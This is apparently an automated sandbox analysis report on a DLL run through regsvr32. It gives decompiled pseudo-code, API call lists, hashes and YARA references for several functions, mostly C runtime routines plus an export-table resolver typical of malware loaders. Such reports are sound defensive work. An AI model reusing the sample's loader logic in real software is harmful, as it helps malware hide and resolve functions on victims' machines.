                                                                              control_flow_graph 300 1003cdf0-1003ce02 301 1003ce04-1003ce0d FlsGetValue 300->301 302 1003ce18-1003ce28 GetModuleHandleA 300->302 301->302 303 1003ce0f-1003ce16 301->303 304 1003ce4a-1003ce52 302->304 305 1003ce2a-1003ce34 GetProcAddress 302->305 306 1003ce3a-1003ce3d 303->306 305->306 306->304 307 1003ce3f-1003ce46 306->307 307->304
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcValue
                                                                              • String ID: DecodePointer$KERNEL32.DLL
                                                                              • API String ID: 144840598-629428536
                                                                              • Opcode ID: 8b1e130dd104f3104bd23486c68a7bd4ddf2545bac40bc83d44ea7238b5b132a
                                                                              • Instruction ID: 25d1bf4d1b9dbe2b21099f957ed11af20757af77cdbce25589faa33f2717a60d
                                                                              • Opcode Fuzzy Hash: 8b1e130dd104f3104bd23486c68a7bd4ddf2545bac40bc83d44ea7238b5b132a
                                                                              • Instruction Fuzzy Hash: B6F0A73170260485ED5BDB57EC547B423A0EB4DBA1F4A0429DD5E4B3A0DF7C94D6C710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003D2E0 Relevance: 7.5, APIs: 5, Instructions: 47memorythreadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              C-Code - Quality: 18%
                                                                              			E1003D2E0(void* __edx, void* __eflags, long* __rax, void* __rcx, void* __rdx, void* __rdi, void* __rsi, void* __r12, void* __r13) {
				void* __rbx;
				intOrPtr _t4;
				void* _t8;
				long _t10;
				intOrPtr _t12;
				intOrPtr _t13;
				long* _t25;
				long* _t26;
				long* _t31;
				void* _t34;

				_t35 = __r12;
				_t33 = __rsi;
				_t32 = __rdi;
				_t25 = __rax;
				E1003B6C0(__eflags, __rax, __rcx, __rdx); // executed
				_t4 = E10042850(_t26, __rdi, __rsi, _t34, __r12, __r13); // executed
				if(_t4 == 0) {
					L5:
					_t12 =  *0x1006f680; // 0x5
					__eflags = _t12 - 0xffffffff;
					if(_t12 != 0xffffffff) {
						__imp__FlsFree();
						 *0x1006f680 = 0xffffffff;
					}
					goto L7;
				} else {
					__imp__FlsAlloc();
					 *0x1006f680 = _t4;
					if(_t4 == 0xffffffff) {
						L7:
						_t13 =  *0x1006f684; // 0xffffffff
						__eflags = _t13 - 0xffffffff;
						if(_t13 != 0xffffffff) {
							TlsFree();
							 *0x1006f684 = 0xffffffff;
						}
						E10042900(_t26, _t32, _t33, _t34, _t35);
						__eflags = 0;
						return 0;
					} else {
						_t8 = E1003D420(_t25, _t26, 0x1003d100, __rdx, _t32, _t33, _t34, _t35);
						_t26 = _t25;
						if(_t25 == 0) {
							goto L5;
						} else {
							_t31 = _t25;
							__imp__FlsSetValue();
							if(_t8 == 0) {
								goto L5;
							} else {
								E1003CEB0(_t25, _t26, _t26, _t31, _t32, _t33);
								_t10 = GetCurrentThreadId();
								_t26[2] = 0xffffffff;
								 *_t26 = _t10;
								return 1;
							}
						}
					}
				}
			}













                                                                              0x1003d2e0
                                                                              0x1003d2e0
                                                                              0x1003d2e0
                                                                              0x1003d2e0
                                                                              0x1003d2e6
                                                                              0x1003d2eb
                                                                              0x1003d2f2
                                                                              0x1003d35b
                                                                              0x1003d35b
                                                                              0x1003d361
                                                                              0x1003d364
                                                                              0x1003d366
                                                                              0x1003d36c
                                                                              0x1003d36c
                                                                              0x00000000
                                                                              0x1003d2f4
                                                                              0x1003d2fb
                                                                              0x1003d304
                                                                              0x1003d30a
                                                                              0x1003d376
                                                                              0x1003d376
                                                                              0x1003d37c
                                                                              0x1003d37f
                                                                              0x1003d381
                                                                              0x1003d387
                                                                              0x1003d387
                                                                              0x1003d391
                                                                              0x1003d396
                                                                              0x1003d39d
                                                                              0x1003d30c
                                                                              0x1003d316
                                                                              0x1003d31e
                                                                              0x1003d321
                                                                              0x00000000
                                                                              0x1003d323
                                                                              0x1003d329
                                                                              0x1003d32c
                                                                              0x1003d334
                                                                              0x00000000
                                                                              0x1003d336
                                                                              0x1003d33b
                                                                              0x1003d340
                                                                              0x1003d346
                                                                              0x1003d34e
                                                                              0x1003d35a
                                                                              0x1003d35a
                                                                              0x1003d334
                                                                              0x1003d321
                                                                              0x1003d30a

                                                                              APIs
                                                                                • Part of subcall function 1003B6C0: _initp_misc_winsig.LIBCMT ref: 1003B6F9
                                                                              • FlsAlloc.KERNEL32(?,?,00000000,1003925D), ref: 1003D2FB
                                                                                • Part of subcall function 1003D420: Sleep.KERNEL32(?,?,?,?,1003CFF7,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D470
                                                                              • FlsSetValue.KERNEL32(?,?,00000000,1003925D), ref: 1003D32C
                                                                                • Part of subcall function 1003CEB0: GetModuleHandleA.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CED0
                                                                                • Part of subcall function 1003CEB0: GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CEFD
                                                                                • Part of subcall function 1003CEB0: GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CF14
                                                                              • GetCurrentThreadId.KERNEL32(?,?,00000000,1003925D), ref: 1003D340
                                                                              • FlsFree.KERNEL32(?,?,00000000,1003925D), ref: 1003D366
                                                                              • TlsFree.KERNEL32(?,?,00000000,1003925D), ref: 1003D381
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeProc$AllocCurrentHandleModuleSleepThreadValue_initp_misc_winsig
                                                                              • String ID:
                                                                              • API String ID: 3227885977-0
                                                                              • Opcode ID: 784a7cd47b51a79e7070ccaddc3dafe68f82002edf4c374d1a9cfecc9881560a
                                                                              • Instruction ID: bd41faa0d80972ce0164b3bd2577986c975ea05562751e1313a832c5d301f9d4
                                                                              • Opcode Fuzzy Hash: 784a7cd47b51a79e7070ccaddc3dafe68f82002edf4c374d1a9cfecc9881560a
                                                                              • Instruction Fuzzy Hash: 2B114C70601A008AE746AF75FC443A83292EB0D3B6F960319F4B64A2F0EF7898D1C621
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10042EB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 380 10042eb0-10042eda call 1003cdf0 382 10042edf-10042ee5 380->382 383 10042ee7-10042ef3 call 1003b3f0 382->383 384 10042f62-10042fa3 382->384 389 10042ef5-10042f04 call 1003c6f0 383->389 390 10042f09-10042f0e 383->390 389->390 392 10042f10-10042f17 390->392 393 10042f19-10042f29 GetModuleHandleA 390->393 394 10042f53-10042f5b call 1003cd20 392->394 395 10042f4c 393->395 396 10042f2b-10042f41 GetProcAddress 393->396 394->384 395->394 396->394 397 10042f43-10042f4a 396->397 397->394
                                                                              C-Code - Quality: 63%
                                                                              			E10042EB0(void* __edx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, long long __r12, long long _a8, long long _a16, long long _a24, long long _a32) {
				intOrPtr _v20;
				char _v24;
				long long _v40;
				_Unknown_base(*)()* _t17;
				intOrPtr _t19;
				intOrPtr _t28;
				long long _t34;
				long long* _t36;
				long long _t39;
				void* _t45;

				_t45 = __rdx;
				_t34 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_a32 = __r12;
				_v24 = 0;
				_t39 =  *0x10075a20; // 0xfb8b24fc0, executed
				E1003CDF0(_t17, __rax, _t39); // executed
				_t36 = _t34;
				if(_t34 == 0) {
					if(E1003B3F0(_t34, _t36,  &_v24, _t45, __rdi, __rsi, __rbp, __r8) != 0) {
						_v40 = __rdi;
						r9d = 0;
						r8d = 0;
						_t21 = E1003C6F0(0, _t45, __r8);
					}
					if(_v24 != 1) {
						_t21 = GetModuleHandleA();
						if(_t34 == 0) {
							_t36 = 0x10042e90;
						} else {
							_t21 = GetProcAddress();
							_t36 = _t34;
							if(_t34 == 0) {
								_t36 = 0x10042e90;
							}
						}
					} else {
						_t36 = 0x10042e90;
					}
					E1003CD20(_t21, _t34, _t36);
					 *0x10075a20 = _t34;
				}
				_t19 =  *_t36();
				_t28 = _t19;
				_v20 = _t19;
				return _t28;
			}













                                                                              0x10042eb0
                                                                              0x10042eb0
                                                                              0x10042eb4
                                                                              0x10042eb9
                                                                              0x10042ebe
                                                                              0x10042ec3
                                                                              0x10042ecf
                                                                              0x10042ed3
                                                                              0x10042eda
                                                                              0x10042edf
                                                                              0x10042ee5
                                                                              0x10042ef3
                                                                              0x10042ef5
                                                                              0x10042efa
                                                                              0x10042efd
                                                                              0x10042f04
                                                                              0x10042f04
                                                                              0x10042f0e
                                                                              0x10042f20
                                                                              0x10042f29
                                                                              0x10042f4c
                                                                              0x10042f2b
                                                                              0x10042f35
                                                                              0x10042f3b
                                                                              0x10042f41
                                                                              0x10042f43
                                                                              0x10042f43
                                                                              0x10042f41
                                                                              0x10042f10
                                                                              0x10042f10
                                                                              0x10042f10
                                                                              0x10042f56
                                                                              0x10042f5b
                                                                              0x10042f5b
                                                                              0x10042f67
                                                                              0x10042f69
                                                                              0x10042f6b
                                                                              0x10042fa3

                                                                              APIs
                                                                                • Part of subcall function 1003CDF0: FlsGetValue.KERNEL32 ref: 1003CE04
                                                                                • Part of subcall function 1003C6F0: RtlCaptureContext.KERNEL32 ref: 1003C701
                                                                                • Part of subcall function 1003C6F0: IsDebuggerPresent.KERNEL32 ref: 1003C745
                                                                                • Part of subcall function 1003C6F0: SetUnhandledExceptionFilter.KERNEL32 ref: 1003C74F
                                                                                • Part of subcall function 1003C6F0: UnhandledExceptionFilter.KERNEL32 ref: 1003C75A
                                                                                • Part of subcall function 1003C6F0: GetCurrentProcess.KERNEL32 ref: 1003C770
                                                                                • Part of subcall function 1003C6F0: TerminateProcess.KERNEL32 ref: 1003C77E
                                                                              • GetModuleHandleA.KERNEL32 ref: 10042F20
                                                                              • GetProcAddress.KERNEL32 ref: 10042F35
                                                                              Strings
                                                                              • InitializeCriticalSectionAndSpinCount, xrefs: 10042F2B
                                                                              • kernel32.dll, xrefs: 10042F19
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$AddressCaptureContextCurrentDebuggerHandleModulePresentProcTerminateValue
                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                              • API String ID: 1369895830-3733552308
                                                                              • Opcode ID: 18ce3b0e02580c84ba45dd2f80a7708e7f3aed87141c4a4d2c89b13b092fefe7
                                                                              • Instruction ID: c7093e94acdbd47fa00214a6f78abb6d94546fce755eacb63de9bea4704cb5ce
                                                                              • Opcode Fuzzy Hash: 18ce3b0e02580c84ba45dd2f80a7708e7f3aed87141c4a4d2c89b13b092fefe7
                                                                              • Instruction Fuzzy Hash: 41215E31715B8082DB15DB16F84078AF3A5F788781FD8103AEA8D87B25EFB8D485CB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10028C74 Relevance: 6.3, APIs: 5, Instructions: 78COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              C-Code - Quality: 39%
                                                                              			E10028C74(void* __ebx, void* __ecx, void* __edx, void* __esi, signed long long __rax, void** __rcx, long long* __rdx, void* __r8, void* __r9, void* __r11) {
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t25;
				signed long long _t37;
				signed long long _t39;
				intOrPtr* _t40;
				signed long long _t43;
				void** _t49;
				signed long long _t50;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t55;
				long long* _t56;

				_t55 = __r11;
				_t54 = __r9;
				_t52 = __r8;
				_t48 = __rdx;
				_t40 = __rcx;
				_t37 = __rax;
				_t25 = __esi;
				_t23 = __edx;
				_t21 = __ecx;
				_t19 = __ebx;
				 *((long long*)(_t51 + 0x20)) = 0xfffffffe;
				_t56 = __rdx;
				_t49 = __rcx;
				_t15 = 0 | __rdx != 0x00000000;
				if(_t15 == 0) {
					_t15 = E10016544();
					asm("int3");
				}
				if( *_t40 == 0) {
					_t37 =  *0x100748f0; // 0x10074900
					if(_t37 == 0) {
						 *((long long*)(_t51 + 0x68)) = 0x10074900;
						E1002885C(_t37, 0x10074900);
						 *0x100748f0 = _t37;
						if(_t37 == 0) {
							E10016544();
							asm("int3");
						}
					}
					_t15 = E100288AC(_t21, _t23, _t25, _t37, _t52, _t54, _t55); // executed
					 *_t49 = _t15;
					if(_t15 == 0) {
						_t15 = E10016544();
						asm("int3");
					}
				}
				_t39 =  *_t49;
				_t50 =  *0x100748f0; // 0x10074900
				EnterCriticalSection(??);
				if(_t19 <= 0) {
					L14:
					LeaveCriticalSection();
					goto L15;
				} else {
					_t6 = _t50 + 0xc; // 0x3e450000000003
					if(_t19 >=  *_t6) {
						goto L14;
					}
					_t15 = TlsGetValue();
					if(_t37 == 0 || _t19 >=  *((intOrPtr*)(_t37 + 0x10))) {
						LeaveCriticalSection();
						goto L16;
					} else {
						_t37 =  *((intOrPtr*)(_t37 + 0x18));
						_t39 =  *((intOrPtr*)(_t37 + _t39 * 8));
						LeaveCriticalSection(??);
						L15:
						if(_t39 != 0) {
							L17:
							return _t15;
						}
						L16:
						 *_t56();
						_t39 = _t37;
						_t43 =  *0x100748f0; // 0x10074900
						_t15 = E10028AA4( *_t49, _t25, _t37, _t43, _t48, _t37, _t54, _t55);
						goto L17;
					}
				}
			}



















                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c74
                                                                              0x10028c7f
                                                                              0x10028c88
                                                                              0x10028c8b
                                                                              0x10028c93
                                                                              0x10028c98
                                                                              0x10028c9a
                                                                              0x10028c9f
                                                                              0x10028c9f
                                                                              0x10028ca3
                                                                              0x10028ca5
                                                                              0x10028caf
                                                                              0x10028cb8
                                                                              0x10028cbd
                                                                              0x10028cc3
                                                                              0x10028ccd
                                                                              0x10028ccf
                                                                              0x10028cd4
                                                                              0x10028cd4
                                                                              0x10028ccd
                                                                              0x10028cd8
                                                                              0x10028cdd
                                                                              0x10028ce1
                                                                              0x10028ce3
                                                                              0x10028ce8
                                                                              0x10028ce8
                                                                              0x10028ce1
                                                                              0x10028ce9
                                                                              0x10028cec
                                                                              0x10028cf7
                                                                              0x10028cff
                                                                              0x10028d39
                                                                              0x10028d3d
                                                                              0x00000000
                                                                              0x10028d01
                                                                              0x10028d01
                                                                              0x10028d04
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10028d09
                                                                              0x10028d12
                                                                              0x10028d31
                                                                              0x00000000
                                                                              0x10028d19
                                                                              0x10028d19
                                                                              0x10028d1d
                                                                              0x10028d25
                                                                              0x10028d45
                                                                              0x10028d48
                                                                              0x10028d61
                                                                              0x10028d6e
                                                                              0x10028d6e
                                                                              0x10028d4a
                                                                              0x10028d4a
                                                                              0x10028d4d
                                                                              0x10028d55
                                                                              0x10028d5c
                                                                              0x00000000
                                                                              0x10028d5c
                                                                              0x10028d12

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32 ref: 10028CF7
                                                                              • TlsGetValue.KERNEL32 ref: 10028D09
                                                                              • LeaveCriticalSection.KERNEL32 ref: 10028D25
                                                                              • LeaveCriticalSection.KERNEL32 ref: 10028D31
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterValue
                                                                              • String ID:
                                                                              • API String ID: 3969253408-0
                                                                              • Opcode ID: 032026dcfb2017ad06061c1a9f29962a25b69d859e033e28122a6438f6939b31
                                                                              • Instruction ID: 119ab4cc6ef5da41d3126f3114a73d5ac56a14211347ee32df9d91ea575157d6
                                                                              • Opcode Fuzzy Hash: 032026dcfb2017ad06061c1a9f29962a25b69d859e033e28122a6438f6939b31
                                                                              • Instruction Fuzzy Hash: 05219339203A46C5DB15DF11FC803982360FB487A8F960125EE6847294EF38D989C750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10007E90 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 34%
                                                                              			E10007E90(signed int __ebx, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __r9, void* __r11, long long _a16, long long _a24, long long _a32) {
				void* _t41;
				void* _t47;
				long long _t53;
				void* _t56;
				intOrPtr _t57;

				_t53 = __rsi;
				_t48 = __rdx;
				_t57 =  *0x10075d08; // 0x180000000
				_a16 = __rbx;
				if(_t57 == 0) {
					L10:
					 *_t48(); // executed
					return 0;
				} else {
					_t2 = _t57 + 0x3c; // 0xb8
					_t47 = __rcx + _t57;
					r11d =  *((intOrPtr*)(_t47 + 0x1c));
					r9d =  *((intOrPtr*)(_t47 + 0x24));
					_t41 =  *_t2 + _t57;
					_t56 = __r9 + _t57;
					if((__ebx & 0xffff0000) != 0) {
						r8d =  *((intOrPtr*)(_t47 + 0x18));
						if(r8d != 0) {
							_a24 = __rsi;
							_a32 = __rdi;
							while(1) {
								_t53 = _t53 + _t57;
								r8d = r8d + 0xffffffff;
								asm("repe cmpsb");
								if(r8d == 0) {
									break;
								}
								_t41 = _t41 + 4;
								_t56 = _t56 + 2;
								if(r8d != 0) {
									continue;
								} else {
								}
								L9:
								goto L10;
							}
							_t48 = _t48 + _t57;
							goto L9;
						}
						goto L10;
					} else {
						 *((long long*)(__rdx + _t57))();
						return 0;
					}
				}
			}








                                                                              0x10007e90
                                                                              0x10007e90
                                                                              0x10007e94
                                                                              0x10007e9d
                                                                              0x10007eac
                                                                              0x10007f49
                                                                              0x10007f49
                                                                              0x10007f56
                                                                              0x10007eb2
                                                                              0x10007eb2
                                                                              0x10007ebe
                                                                              0x10007ec1
                                                                              0x10007ec8
                                                                              0x10007ecf
                                                                              0x10007ed2
                                                                              0x10007edb
                                                                              0x10007ef8
                                                                              0x10007eff
                                                                              0x10007f01
                                                                              0x10007f06
                                                                              0x10007f10
                                                                              0x10007f1a
                                                                              0x10007f1d
                                                                              0x10007f21
                                                                              0x10007f23
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10007f25
                                                                              0x10007f29
                                                                              0x10007f30
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10007f32
                                                                              0x10007f3f
                                                                              0x00000000
                                                                              0x10007f44
                                                                              0x10007f3c
                                                                              0x00000000
                                                                              0x10007f3c
                                                                              0x00000000
                                                                              0x10007edd
                                                                              0x10007eea
                                                                              0x10007ef7
                                                                              0x10007ef7
                                                                              0x10007edb

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcessUser
                                                                              • String ID: K36xXEyaGH5
                                                                              • API String ID: 3902816426-478515645
                                                                              • Opcode ID: 14e4534f9008de7cad6f6882a564f101e515b4eab7f7cf04ea7d4319c38f02b9
                                                                              • Instruction ID: f1586331a2c0886a7638b4c74cd0d916ef8f7c0af96efc7da7620b342db7dc17
                                                                              • Opcode Fuzzy Hash: 14e4534f9008de7cad6f6882a564f101e515b4eab7f7cf04ea7d4319c38f02b9
                                                                              • Instruction Fuzzy Hash: D811B272F1056087DB54CF1AD840B6A77A1FB49BC2FA54121EF4D47B5CDA39DC528B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003D610 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(?,?,?,?,1003923C), ref: 1003D622
                                                                              • HeapSetInformation.KERNELBASE ref: 1003D651
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CreateInformation
                                                                              • String ID:
                                                                              • API String ID: 1774340351-0
                                                                              • Opcode ID: 4764f45a1119d9940a4f020d002daac32f478c517246d334b33e975c7c30382f
                                                                              • Instruction ID: 31295a416c8edab1b91234815520e95743c64b031a5e86490d96ea17185061f0
                                                                              • Opcode Fuzzy Hash: 4764f45a1119d9940a4f020d002daac32f478c517246d334b33e975c7c30382f
                                                                              • Instruction Fuzzy Hash: 64E0DFB5B2269082E789AB21AC4A7C53350F38C385FC45029FA8D02B64EFBCC1D58F00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800178A8 Relevance: 1.6, APIs: 1, Instructions: 122processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                                                              • Instruction ID: 2da17281d2a08d1ac9b8a996dbaf27e8716b5e9a88d25284efbd0f172fd1731a
                                                                              • Opcode Fuzzy Hash: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                                                              • Instruction Fuzzy Hash: 7041417051CB848FDBB8DF18E48979AB7E0FB88314F104A5DE48EC7245DB749885CB86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003B030 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 46%
                                                                              			E1003B030(void* __eax, long long __rbx, signed long long __rcx, long long __rdx, long long __rdi, void* __rsi, void* __rbp, intOrPtr* __r8, long long _a24, long long _a32) {
				long long _v24;
				void* _t17;
				void* _t36;

				_t40 = __rcx;
				_a24 = __rbx;
				_a32 = __rdi;
				_t45 = __r8;
				_t34 = __rdx;
				if(__rcx == 0 || 0xffffffe0 >= __rdx) {
					_t36 =  ==  ? 0xffffffe0 : _t34 * _t40;
					do {
						_t17 = 0;
						if(_t36 > 0xffffffe0) {
							L6:
							if( *0x10075790 == 0) {
								if(_t45 != 0) {
									 *_t45 = 0xc;
								}
								goto L13;
							} else {
								goto L7;
							}
						} else {
							_t17 = RtlAllocateHeap(); // executed
							if(0xffffffe0 != 0) {
								L13:
								return _t17;
							} else {
								goto L6;
							}
						}
						goto L14;
						L7:
					} while (E1003E830(0xffffffe0, _t36) != 0);
					if(_t45 != 0) {
						 *_t45 = 0xc;
					}
					return 0;
				} else {
					E1003AF40(0xffffffe0);
					r9d = 0;
					r8d = 0;
					_v24 = 0;
					 *0xffffffe0 = 0xc;
					E1003C790(__rdx, __rcx, __rdx, __r8, __rsi, __rbp, __r8);
					return 0;
				}
				L14:
			}






                                                                              0x1003b030
                                                                              0x1003b037
                                                                              0x1003b03c
                                                                              0x1003b041
                                                                              0x1003b044
                                                                              0x1003b047
                                                                              0x1003b09a
                                                                              0x1003b0a0
                                                                              0x1003b0a0
                                                                              0x1003b0a6
                                                                              0x1003b0c0
                                                                              0x1003b0c7
                                                                              0x1003b0f4
                                                                              0x1003b0f6
                                                                              0x1003b0f6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003b0a8
                                                                              0x1003b0b5
                                                                              0x1003b0be
                                                                              0x1003b0fc
                                                                              0x1003b10a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003b0be
                                                                              0x00000000
                                                                              0x1003b0c9
                                                                              0x1003b0d1
                                                                              0x1003b0d8
                                                                              0x1003b0da
                                                                              0x1003b0da
                                                                              0x1003b0f0
                                                                              0x1003b05a
                                                                              0x1003b05a
                                                                              0x1003b05f
                                                                              0x1003b062
                                                                              0x1003b069
                                                                              0x1003b072
                                                                              0x1003b078
                                                                              0x1003b08d
                                                                              0x1003b08d
                                                                              0x00000000

                                                                              APIs
